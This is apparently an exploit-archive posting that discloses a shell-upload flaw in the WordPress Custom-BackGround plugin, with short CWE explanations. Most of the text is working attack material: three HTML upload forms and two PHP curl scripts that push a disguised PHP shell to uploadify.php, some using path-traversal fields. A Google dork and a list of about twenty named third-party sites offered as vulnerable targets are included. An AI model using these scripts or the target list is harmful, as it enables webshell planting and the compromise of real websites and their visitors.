WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability

2020.03.19
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434 CWE-264 CWE-352
Dork: inurl:/wp-content/plugins/custom-background/

#################################################################### # Exploit Title : WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 19/03/2020 # Vendor Homepage : # Sofware Link : plugins.righthere.com/custom-backgrounds/ # Software Affected Version : Requires at least: 3.0 Tested up to: 3.3.1 Stable tag: 3.1.5 rev22255 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dork : inurl:/wp-content/plugins/custom-background/ # Vulnerability Type : CWE-352 [ Cross-Site Request Forgery (CSRF) ] CWE-264 [ Permissions, Privileges, and Access Controls ] CWE-434 [ Unrestricted Upload of File with Dangerous Type ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Impact : *********** WordPress Custom-BackGround Plugins 3.0 is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. CWE-352: Cross-Site Request Forgery (CSRF) ****************************************** The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution. CWE-264: Permissions, Privileges, and Access Controls ************************************************** Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. CWE-434: Unrestricted Upload of File with Dangerous Type **************************************************** The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. #################################################################### # Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit : *************************************************************** CSRF Cross Site Request Forgery Exploiter 1 => ****************************************** <form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/custom-background/uploadify/uploadify.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form> # CSRF Cross Site Request Forgery Exploit 2 => **************************************** <title>WordPress Custom-BackGround Plugins Exploiter</title> <form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/custom-background/uploadify/uploadify.php" method="post" enctype="multipart/form-data"> <body background=" "> <input type="file" name="file" id="file"><br> <input name="form_id" value="../../../" type=hidden"> <input name="name" value="kingskrupellos.php.pjpg" type=''hidden"> <input name="gform_unique_id" value="../../" type="hidden"> <input name="field_id" value="" type="hidden"> <input type="submit" name="gform_submit" value="submit"> # CSRF Cross Site Request Forgery Exploit 3=> **************************************** <html> <body> <form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/custom-background/uploadify/uploadify.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" /> <input type="hidden" name="album_desc" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form> </body> </html> </form> PHP Exploiter Code 1 : ********************* <?php $uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^ $ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('file'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> PHP Exploiter Code 2 : ********************* <?php $uploadfile="kingskrupellos.php.jpg"; $ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'folder'=>'/wp-content/plugins/custom-background/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # Vulnerability Error : ******************** {"R":"ERR","MSG":"No access"} /wp-content/plugins/custom-background/uploadify/uploadAttachment.php /wp-content/plugins/custom-background/uploadify/uploadify.php #################################################################### # Example Vulnerable Sites : ************************ [+] btee.org/wp-content/plugins/custom-background/uploadify/uploadify.php [+] pureflixstudio.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] piersfaccini.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] greentouch.tn/shop/wp-content/plugins/custom-background/uploadify/uploadify.php [+] chalet-des-sens.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] conamiescie.info/wp-content/plugins/custom-background/uploadify/uploadify.php [+] normandiecontacts.fr/wp-content/plugins/custom-background/uploadify/uploadify.php [+] capsostv.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] whiteandbluereview.com/dev/wp-content/plugins/custom-background/uploadify/uploadify.php [+] visitequebec.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] insidefitnessmag.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] espressomelbourne.com/2014/wp-content/plugins/custom-background/uploadify/uploadify.php [+] zozijncoaching.nl/site/wp-content/plugins/custom-background/uploadify/uploadify.php [+] africanamericangolfersdigest.com/wp-content/plugins/custom-background/uploadify/uploadify.php [+] waterwellsforafrica.org/wp-content/plugins/custom-background/uploadify/uploadify.php [+] radio104.fm.br/wp-content/plugins/custom-background/uploadify/uploadify.php [+] karikatur-graz.at/wp-content/plugins/custom-background/uploadify/uploadAttachment.php [+] purplepictures.net/wp-content/plugins/custom-background/uploadify/uploadify.php [+] osiguranje.me/wp-content/plugins/custom-background/uploadify/uploadAttachment.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top